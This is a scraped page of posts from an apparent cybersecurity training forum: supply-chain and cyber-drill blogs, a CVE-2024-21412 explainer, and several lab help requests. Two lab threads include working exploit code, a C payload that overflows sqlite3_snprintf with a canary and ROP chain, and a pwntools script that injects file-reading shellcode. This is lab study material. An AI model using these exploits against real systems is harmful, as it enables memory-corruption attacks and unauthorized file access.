An Ounce of Prevention Beats a Pound of Postmortem with Supply Chain Security
Supply chain security is all about protecting your organization from risks and threats that come from external parties and processes you rely on. But trust, like code, is a dependency. And risk? That’s a side effect. Case in point: this month, a widely used GitHub Action, tj-actions/changed-files, was compromised, proving that when the Git hits the fan, it can blow secrets across thousands of repos (CVE-2025-30066). It was a textbook case of a supply chain attack: a legitimate, trusted tool hijacked and used to compromise downstream users. Now, don’t get me wrong, we all love GitHub and a secure CI/CD pipeline. But when attackers injected malicious code into the action, stealing secrets like personal access tokens, npm tokens, and private RSA keys from affected CI/CD pipelines, over 23,000 repositories were exposed to cyber risk. This wasn’t a breach caused by a missed patch or weak password - it was a breach of inherited trust. It highlights a pressing truth: supply chain security isn’t just a technical problem. It’s a cultural one. It demands dynamic cyber resilience. And I know you’re tired of hearing about SolarWinds, Logs4Shell, and Kaseya. But it’s not just your security at stake – it’s everyone you rely on and everyone who relies on you. Even right now, we are watching The Biggest Supply Chain Hack Of 2025: 6M Records Exfiltrated from Oracle Cloud affecting over 140k Tenants 🙀 That’s why dependency monitoring, minimal permissions, and source validation are critical to securing your supply chain. In today’s software-driven world, trust is embedded in every layer of how we build and ship technology. We trust the tools, the teams, the platforms, the packages. To mitigate risks effectively, we need a clear understanding of them. Let’s explore approaching this with Immersive. Third-party risk management Business stakeholder lens: Procurement and vendor management teams must understand that security isn't just a checkbox during onboarding. Ongoing third-party risk reviews and SLAs with teeth are essential. Security leaders should train these teams to ask the right questions and recognize red flags. Risk ISO 28000 – Security Management Systems for Supply Chains NIST 800-53: Ep.20 – Supply Chain Risk Management Technical stakeholder lens: Security teams must know how to evaluate vendor security postures, monitor for changes, and validate that data flows are compliant and secure. Training should focus on threat modeling integrations and validating trust assumptions in vendor tooling. Secure Fundamentals: Security Patching Mobile Application Security Fundamentals: Inadequate Supply Chain Security Software supply chain Business stakeholder lens: Non-technical leaders should understand that open source and third-party code aren't free – they come with ongoing maintenance, monitoring, and potential exposure. Funding and prioritization decisions should reflect this risk. NCSC Cloud Security: Ep.9 – Supply Chain Security Stack Overflow Secure Fundamentals: Least Privileges Introducing the Cyber Kill Chain Technical stakeholder lens: Developers and AppSec teams need to understand transitive dependencies (a.k.a. shadow dependencies), know how to interpret Software Bill of Materials (SBOMs), and be trained to look beyond their own code. CI/CD workflows must be hardened, with guardrails baked into the process. CVE-2024-3094 (xz) – Supply Chain Compromise Events & Breaches: Monero Wallet Supply Chain Compromise Sunburst Supply Chain Compromise Collection Hardware and physical supply chain Business stakeholder lens: Especially in regulated or critical industries, leaders must ensure that logistics and sourcing teams are trained to recognize risks around counterfeit or tampered hardware. Business Continuity 101 NIST 800-53: Ep.11 – Physical and Environmental Protection IST 800-53: Ep.1 – Access Control Technical stakeholder lens: IT and SecOps teams should be trained on verifying hardware provenance, firmware integrity, and secure provisioning practices. This is often an overlooked area in cyber training programs. IoT & Embedded Devices: Supply Chain Hardware Tampering Data handling in the chain Business stakeholder lens: Legal and compliance teams must understand how data moves across vendors and jurisdictions. Training should focus on recognizing data sovereignty issues, breach notification responsibilities, and contractual risks. Compliance Data Handling Secure Fundamentals: The CIA Triad Secure Data Handling Technical stakeholder lens: Data engineers, architects, and security teams should be trained on protecting data in transit and at rest, especially when working with third-party platforms or integrations. Zero trust principles also apply. OWASP 2021: Ep.8 – Software and Data Integrity Failures Modern Encryption Operational resilience Business stakeholder lens: Executives and business continuity teams must recognize that vendor outages or upstream compromises can impact downstream. Tabletop exercises should incorporate supply chain attack scenarios. Recommended reading: House of cards: surviving a supply chain attack Labs: Cyber for Board Members: Ep.8 – Supply Chains Cyber for Executives: Ep.7 – Supply Chain Security NIST 800-53: Ep.6 – Contingency Planning NIST 800-53: Ep.8 – Incident Response Technical stakeholder lens: Incident response and engineering teams should be trained to detect and contain incidents involving third parties. This includes monitoring dependencies, rotating credentials, and updating playbooks for modern attack chains. No Labs this time! Exercising becomes critical: Cyber Training Essentials for Supply Chain Resilience Supply Chain: Template for Technical Teams You may not cause the vulnerability, but you'll own the breach. You can’t wait until the postmortem to start training your teams to see beyond the perimeter. A resilient cyber culture ensures that your people are ready to respond when trust is compromised. Supply chain security is a shared responsibility, but it starts with recognition and increasing cultural buy-in. At the end of the day, an ounce of prevention beats a pound of postmortem. Share your thoughts Did you learn anything surprising about the interconnectedness of supply chain risks? What do you think is the biggest hurdle to strong supply chain security? Share a practical tip or strategy that worked for you! Big thanks to ZacharyAbrams for assisting with content reviews and recommendations in today’s blog! Want laser-focused recommendations for your unique program needs? Chat with your CSM about Premium Support to work with legends like Zack! Get updates in your inbox on posts like this by following the Human Connection Blog!Foundational Static Analysis: API Analysis
Hi all, I'm stuck in this part, where using Ghidra, I have to find where the Windows API GetModuleHandleA is used, in the binary called exercise_two.exe, and once located, find the parameter of this function. Taking a look about GetModuleHandleA, there's no references or calls to API in any part of the code. Also tried to look for references to GetProcAddress or LoadLibrary and nothing. Am doing something wrong? Any idea to find the "parameter" of the function that calls to the API?. Is the only question from this part remaining... Thanks and regards.23Views2likes0CommentsCyber Drills and Outcome-Based Programs: A Hands-On Approach to Cyber Resilience
What are cyber drills and outcome-based programs? Cyber drills vs. outcome-based programs Cyber drills Prove Outcome-based programs Improve Simulate a realistic cyberattack to test response capabilities Ongoing, structured programs to build and improve security operations Benchmark security preparedness at a given point in time Measure progress over time with defined success metrics Team-based exercises that focus on immediate response Tailored multi-year programs that address specific security gaps One-off or periodic events Continuous learning and improvement The key difference is that cyber drills test and prove preparedness and expose improvement areas; outcome-based programs address the improvement areas and enhance an organization’s ability to detect, respond, and recover from cyber threats. Combined, these approaches provide sustainable, robust cyber resilience. Designing an effective outcome-based program To implement an outcome-based program successfully, organizations must consider the following factors: 1. Understanding business objectives and risk tolerance Before designing a program, it’s crucial to understand: Business goals – what is the organization trying to achieve? Risk appetite – how much risk is the company willing to take? Regulatory requirements – what compliance standards must be met? 2. Defining measurable outcomes Success should be based on quantifiable improvements, such as: Reduced incident response time Fewer security breaches Improved threat detection capabilities More substantial alignment with regulatory requirements 3. Tailoring the program to the organization Organizations are unique, and outcome-based programs must be customized to fit: Risk assessment results Threat landscape Technology stack and processes Security team capabilities 4. Implementing and monitoring progress A phased approach ensures better adoption: Pilot phase – test the program with a small team before full deployment Phased rollout – implement step-by-step to ensure success Continuous reporting – regularly track metrics and adjust the program as needed 5. Demonstrating ROI and business value To gain leadership buy-in, organizations must: Showcase case studies of successful implementations Use data-driven insights to highlight improvements Demonstrate long-term value beyond compliance Example: A multi-year cybersecurity resilience program A well-structured outcome-based program can span multiple years, evolving as threats change. Year 1 – Conduct cyber drills, crisis and incident response exercises and assessments, and document response plans. Develop improvement plans and program scope. Year 2 – Technical and executive training, incident handling exercises. Year 3 – Advanced cybersecurity drills, scenario-based threat modeling, multi-team exercising. Process and policy stress testing. Year 4 – Purple teaming, improving collaboration between defense and offense teams. Year 5 – Full-scale red teaming and supply chain cyber drills. This approach ensures that organizations continuously prove and improve rather than just react to incidents. Final thoughts: The future of cybersecurity training Moving from traditional cybersecurity upskilling to cyber drills and outcome-based programs requires: A shift in mindset – focus on long-term resilience, not just one-time testing. Cross-department collaboration – security is not just IT’s responsibility; leadership buy-in is crucial. Expertise in design and delivery – outcome-based programs must be well-structured and measurable. By embracing cyber drills and outcome-based cybersecurity training programs, organizations can stay ahead of threats and build a stronger, lasting security culture. Share your thoughts Is your organization ready to move beyond traditional cyber upskilling? Where do you feel the biggest challenge lies, out of the three points mentioned above? Have you had success in overcoming these challenges? If so, share how with the community. Let’s build a cybersecurity strategy that delivers accurate, measurable results.45Views1like0CommentsLinux Stack Overflow Ep.6
I am having trouble figuring how this lab. I got the other questions, but can't get the token. This is the code I am running, but it just causing a segmentation fault. #include <assert.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <sqlite3.h> #define RETADDR_OFFSET 0 #define CANARY_OFFSET 0x40 #define BUF_OFFSET 0x88 #define CANARY 0xbaadd00dbaadd00dull #define ROPGADGET 0xdeadbeefdeadbeefull #define NGADGETS 1 struct payload { uint8_t padding1[BUF_OFFSET-CANARY_OFFSET]; uint64_t canary; uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8]; uint64_t ropchain[NGADGETS]; }__attribute__((packed, aligned(1))); int main(int argc, char *argv[]) { char dst[256]; struct payload p; memset(p.padding1, 'a', sizeof(p.padding1)); p.canary = CANARY; memset(p.padding2, 'b', sizeof(p.padding2)); p.ropchain[0] = ROPGADGET; size_t target_n = 0x80000000; assert(sizeof(p) + 3 <= target_n); size_t n = target_n - sizeof(p) - 3; size_t target_i = 0x100000000 + (sizeof(p) / 2); char *src = calloc(1, target_i); if (!src) { printf("bad allocation\n"); return -1; } size_t cur = 0; memcpy(src, &p, sizeof(p)); cur += sizeof(p); memset(src+cur, '\'', n/2); cur += n/2; assert(cur < 0x7ffffffeul); memset(src+cur, 'c', 0x7ffffffeul-cur); cur += 0x7ffffffeul-cur; src[cur] = '\xc0'; cur++; memset(src+cur, '\x80', target_i - cur); cur = target_i; src[cur-1] = '\0'; sqlite3_snprintf((int) 256, dst, "'%!q'", src); free(src); return 0; }30Views1like1CommentUnderstanding CVE-2024-21412: A Zero-Day Exploit Targeting Windows Users
What is CVE-2024-21412? CVE-2024-21412 is a security feature bypass vulnerability in Windows Defender SmartScreen. SmartScreen typically evaluates the safety of downloaded files and displays warnings for unrecognised or suspicious ones. But this vulnerability allows attackers to circumvent warnings and install malware on unsuspecting systems. Which systems are affected? CVE-2024-21412 impacts a broad range of Windows systems, including: Windows 10 (various versions) Windows 11 (various versions) Windows Server 2019 and later versions How can this vulnerability be used against your systems? Attackers exploited CVE-2024-21412 by crafting a Windows Internet shortcut (.url file) that pointed to another .url file on a remote SMB share. This technique tricked the system into automatically executing the file at the final location, bypassing SmartScreen's security warnings. Researchers even created a proof-of-concept exploit, demonstrating how easy the vulnerability is to exploit. Attackers also abused the Microsoft Search Protocol (MSP) to deceive users. They crafted malicious links that appeared to point to local files, but in reality, connected to an attacker-controlled server. This tricked users into opening malicious files without realising they were downloading them from an external source. How to protect your organisation Microsoft addressed CVE-2024-21412 with a patch released in mid-February 2024. Installing this patch is crucial to mitigate the risk associated with this vulnerability. In addition to patching, organisations should implement comprehensive monitoring and detection systems to identify and mitigate threats across all stages of an attack. This includes using intrusion detection systems, firewalls, and security information and event management (SIEM) tools to monitor network traffic and system activity for suspicious behaviour. Organisations should also consider employing advanced real-time behaviour analytics to monitor unusual activity and identify potential threats, even when they bypass traditional security measures. This involves analysing user and system behaviour patterns to detect anomalies that could indicate an attack. Conclusion CVE-2024-21412 highlights the importance of cybersecurity awareness and proactive measures, which can be mitigated with improved organisational cyber resilience and regular patching policies. As always, staying informed about potential vulnerabilities is a crucial step in reducing the risk of your organisation being attacked. Recommended content To learn how to detect this vulnerability in a sandboxed environment, check out the following lab: CVE-2024-21412 (SmartScreen Bypass) – Elastic Log Analysis. In this lab, you'll use ElasticSearch to detect the presence of malicious URL files in logs. Share your thoughts Have you seen this vulnerability being exploited in the wild? Have you patched your systems yet? Share your thoughts by commenting in the thread below.19Views0likes0CommentsNeed Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immersivelabs/comments/1ap3tub/pwntools_ep_6_demonstrate_your_skills/) but it is still not working. Could you please help me with this if possible shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) is what I tried from pwn import * import struct # Start the challenge binary p = process("/opt/demonstrate-challenge") # Use the correct path # === Part 1: Solve Arithmetic Challenge === p.recvuntil(b"What is the sum of ") numbers = p.recvline().decode().strip().split(" and ") num1 = int(numbers[0]) num2 = int(numbers[1].split("?")[0]) print(f"[+] Solving: {num1} + {num2} = {num1 + num2}") p.sendline(str(num1 + num2)) # === Part 2: Solve Packing Challenge === p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n") values = p.recvline().decode().strip().split(" and ") val1 = int(values[0]) val2 =int(values[1]) print(f"[+] Packing values: {val1} and {val2}") payload = struct.pack("<II", val1, val2) p.send(payload) # === Part 3: Leak Address of parsing_check() === elf = ELF("/opt/demonstrate-challenge") # Load the ELF binary parsing_check_addr = elf.symbols['parsing_check'] # Get function address print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}") p.sendline(str(parsing_check_addr)) # === Part 4: Send Shellcode to Read /home/token-user/token.txt === file_path = '/home/token-user/token.txt' shellcode = shellcraft.cat2(file_path, 1, 40) # Pwntools shellcode shellcode += shellcraft.ret() # Ensure proper return assembled_shellcode = asm(shellcode) p.send(assembled_shellcode) # === Get Flag Output === response = p.recvall() print(response)93Views1like10CommentsHistoric Steganography Lab
I've been stuck on question 6 in the Stenography lab within the Historic Encryption upskill series. I'm not sure if I'm missing something within the command line or if the password/passphrase for the file is wrong. The password/passphrase is supposed to be "carnivale" Here are some screenshots to help zero in where I'm at. Thanks all!Solved41Views2likes2CommentsHelp again Linux CLI: Ep.16 – Combining Commands
I feel like I'm banging my head against the wall with the last 2 questions of this lab. I've been stuck on question 5 for the grep command. Any hints of what am I doing wrong? missing? And then the last question to run sleep. Huh? Is there a command to combine with the sleep 600? Any help would be appreciated. So I can finally do the last lab for Linux. =)Solved49Views1like2CommentsNeed Help - Java: Insecure Temporary Files
This exercise appears to be fairly simple at first glance, however I am unable to meet the criteria for my code to be accepted. When I click on "Test My Code", it says "Working" but not "Secure". The Deployment Log says, "VERIFY: Testing application functionality... VERIFY: PASS: Healthcheck page retrieved successfully VERIFY: PASS: Login page retrieved successfully VERIFY: PASS: Logged in with valid credentials VERIFY: PASS: User data loaded VERIFY: Tests complete. Application is WORKING Ideally, either the Application Log or the Deployment Log should provide some clue of the error or the task that is not completed. I have used the recommended method to create a Temporary File and delete it in a finally block after use. I can provide my code changes here, if needed.Solved27Views0likes2Comments